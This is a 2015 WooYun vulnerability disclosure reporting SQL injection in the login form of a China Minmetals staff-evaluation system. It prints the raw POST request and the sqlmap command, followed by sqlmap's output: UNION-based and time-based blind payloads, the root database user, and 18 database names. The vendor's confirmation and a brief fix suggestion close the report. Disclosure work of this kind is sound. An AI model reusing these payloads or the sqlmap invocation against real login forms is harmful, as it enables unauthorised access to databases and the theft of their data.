当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127369

漏洞标题:五矿集团公司某系统存在SQL注入

相关厂商:中国五矿集团公司

漏洞作者: 路人甲

提交时间:2015-07-20 17:24

修复时间:2015-09-06 11:18

公开时间:2015-09-06 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

五矿集团公司某系统存在SQL注入

详细说明:

http://cmnhr.minmetals.com.cn/index.jsp五矿有色成员企业年度干部考评系统用户名登录处存在SQL注入
POST http://cmnhr.minmetals.com.cn/login.jsp HTTP/1.1
Host: cmnhr.minmetals.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://cmnhr.minmetals.com.cn/
Cookie: JSESSIONID=98108F9821CA3F6B7D68A532A0E394F5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
username=admin&password=admin&f_login_ok=
注入点username
将请求存入txt文本,然后用sqlmap跑下
Sqlmap py -r 1s.txt -p "username" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 80 HTTP(s) requ
ests:
---
Place: POST
Parameter: username
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: username=admin' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL,
NULL, NULL, NULL, CONCAT(0x3a6773693a,0x59574d6854635876574c,0x3a6c646b3a), NULL
, NULL, NULL, NULL#&password=admin&f_login_ok=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: username=admin' AND SLEEP(5) AND 'sZby'='sZby&password=admin&f_logi
n_ok=
---
[15:33:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[15:33:30] [INFO] fetching current user
current user: 'root@localhost'
[15:33:30] [INFO] fetching current database
current database: 'kpi_gb'
[15:33:30] [INFO] fetching database names
[15:33:31] [INFO] the SQL query used returns 18 entries
[15:33:31] [INFO] retrieved: "information_schema"
[15:33:31] [INFO] retrieved: "bugfree2"
[15:33:31] [INFO] retrieved: "ghzk"
[15:33:31] [INFO] retrieved: "kpi2009"
[15:33:31] [INFO] retrieved: "kpi2010"
[15:33:34] [INFO] retrieved: "kpi2011"
[15:33:34] [INFO] retrieved: "kpi2011_test"
[15:33:34] [INFO] retrieved: "kpi2012"
[15:33:35] [INFO] retrieved: "kpi2012fk"
[15:33:35] [INFO] retrieved: "kpi2013"
[15:33:35] [INFO] retrieved: "kpi2013b"
[15:33:35] [INFO] retrieved: "kpi2013c"
[15:33:35] [INFO] retrieved: "kpi2014"
[15:33:35] [INFO] retrieved: "kpi2014b"
[15:33:36] [INFO] retrieved: "kpi2015_hn"
[15:33:36] [INFO] retrieved: "kpi_gb"
[15:33:36] [INFO] retrieved: "mysql"
[15:33:36] [INFO] retrieved: "test"
available databases [18]:
[*] bugfree2
[*] ghzk
[*] information_schema
[*] kpi2009
[*] kpi2010
[*] kpi2011
[*] kpi2011_test
[*] kpi2012
[*] kpi2012fk
[*] kpi2013
[*] kpi2013b
[*] kpi2013c
[*] kpi2014
[*] kpi2014b
[*] kpi2015_hn
[*] kpi_gb
[*] mysql
[*] test

漏洞证明:

已证明

修复方案:

过滤特殊字符

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-23 11:18

厂商回复:

正在抓紧修复漏洞,感谢您的帮助!

最新状态:

暂无


漏洞评价:

评论